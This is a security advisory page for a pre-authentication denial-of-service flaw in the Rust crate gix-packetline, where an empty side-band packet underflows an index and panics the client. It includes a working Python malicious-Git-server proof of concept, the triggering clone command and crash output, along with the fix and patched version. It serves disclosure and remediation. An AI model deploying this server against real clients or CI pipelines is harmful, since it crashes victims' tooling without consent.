GHSA-2vh6-hw4j-32wwMedium· 6.5▾ Sunlitgix-packetline: reachable panic on empty side-band packet (pre-auth network DoS)
▾ Sunlit zone — Low / medium · no exploitation signal
impact 35.8 · likelihood 0 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
gix-packetline panics when it receives a side-band packet line that contains only the band-id byte with an empty payload. A malicious Git server - or any remote a victim clones/fetches from - can abort the gix client process during a normal fetch. This is a pre-authentication, network-triggered denial of service.
In gix-packetline/src/lib.rs, impl From<&[u8]> for TextRef strips a trailing newline with d[d.len() - 1]:
https://github.com/GitoxideLabs/gitoxide/blob/eac50e1207e2549b23302c9faf595a420b9919fc/gix-packetline/src/lib.rs#L199
When d is empty (an empty side-band payload after the band-id byte is removed), d.len() - 1 underflows usize (to 18446744073709551615, i.e. 0 - 1) and the index access panics. The empty side-band line is attacker-supplied and is reached during a normal fetch.
(Related: an unchecked split_at_mut in gix-packetline/src/blocking_io/read.rs is in the same DoS class and worth hardening in the same pass.)
Confirmed against gix v0.54.0 (crate gix-packetline 0.21.4) and current main.
127.0.0.1:9418. It completes a protocol-v2 handshake (ls-refs, fetch), then sends a packfile header followed by the bytes 0005 + 0x02 - a side-band line of length 5 whose content is the single band-id byte 0x02 with an EMPTY payload:import socket
HOST, PORT = "127.0.0.1", 9418
def pkt(d): return ("%04x" % (len(d)+4)).encode() + d
FLUSH=b"0000"; OID=b"1234567890123456789012345678901234567890"
def handle(c):
c.recv(65536)
c.sendall(pkt(b"version 2\n")+pkt(b"agent=git/evil\n")+pkt(b"ls-refs=unborn\n")
+pkt(b"fetch=shallow wait-for-done\n")+pkt(b"object-format=sha1\n")+FLUSH)
buf=b""; sent=False
while True:
d=c.recv(65536)
if not d: return
buf+=d
if b"command=ls-refs" in buf and not sent:
c.sendall(pkt(OID+b" HEAD symref-target:refs/heads/master\n")
+pkt(OID+b" refs/heads/master\n")+FLUSH); sent=True; buf=b""; continue
if b"command=fetch" in buf and (buf.rstrip().endswith(b"0000") or b"done" in buf):
c.sendall(pkt(b"packfile\n") + b"0005\x02") # band id 2, EMPTY payload
try: c.recv(4096)
except Exception: pass
return
s=socket.socket(); s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
s.bind((HOST,PORT)); s.listen(1); print("listening",PORT)
conn,_=s.accept(); conn.settimeout(5.0)
try: handle(conn)
finally: conn.close(); s.close()
RUST_BACKTRACE=1 gix clone git://127.0.0.1:9418/repo.git /tmp/out
Observed:
thread 'main' panicked at gix-packetline/src/lib.rs:199:20:
index out of bounds: the len is 0 but the index is 18446744073709551615
exit code: 101
A pre-authentication, network-triggered denial of service. Any tool, library, or CI pipeline that clones/fetches from an attacker-influenced remote using gix / gix-packetline crashes (process abort). No authentication is required, and in unattended automation no user interaction gates the fetch.
Guard the empty-slice case instead of indexing unconditionally, e.g. let d = d.strip_suffix(b"\n").unwrap_or(d);, or check !d.is_empty() / d.last() == Some(&b'\n') before slicing.
gix-packetline <= 0.21.4Upgrade to a patched release:
gix-packetline 0.21.5Connected by shared product, vendor, weakness, or advisory.
CVE-2026-82250Medium· 6.5gix-packetline: reachable panic on empty side-band packet (pre-auth network DoS)
CVE-2019-12678High· 7.5A vulnerability in the Session Initiation Protocol (SIP) inspection module of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a d…
CVE-2024-0565Medium· 6.8An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel
CVE-2025-67269High· 7.5An integer underflow vulnerability exists in the `nextstate()` function in `gpsd/packet.c` of gpsd versions prior to commit `ffa1d6f40bca0b035fc7f5e563160ebb67199da7`
CVE-2026-93599High· 7.5rustls-webpki through 0.103.12 (and 0.104.0-alpha releases before 0.104.0-alpha.7) contains a reachable panic in bit_string_flags() in src/der.rs
CVE-2026-88376High· 7.5Bento4 1.6.0.0 contains an integer underflow vulnerability in AP4_AvccAtom::Create() and AP4_HvccAtom::Create()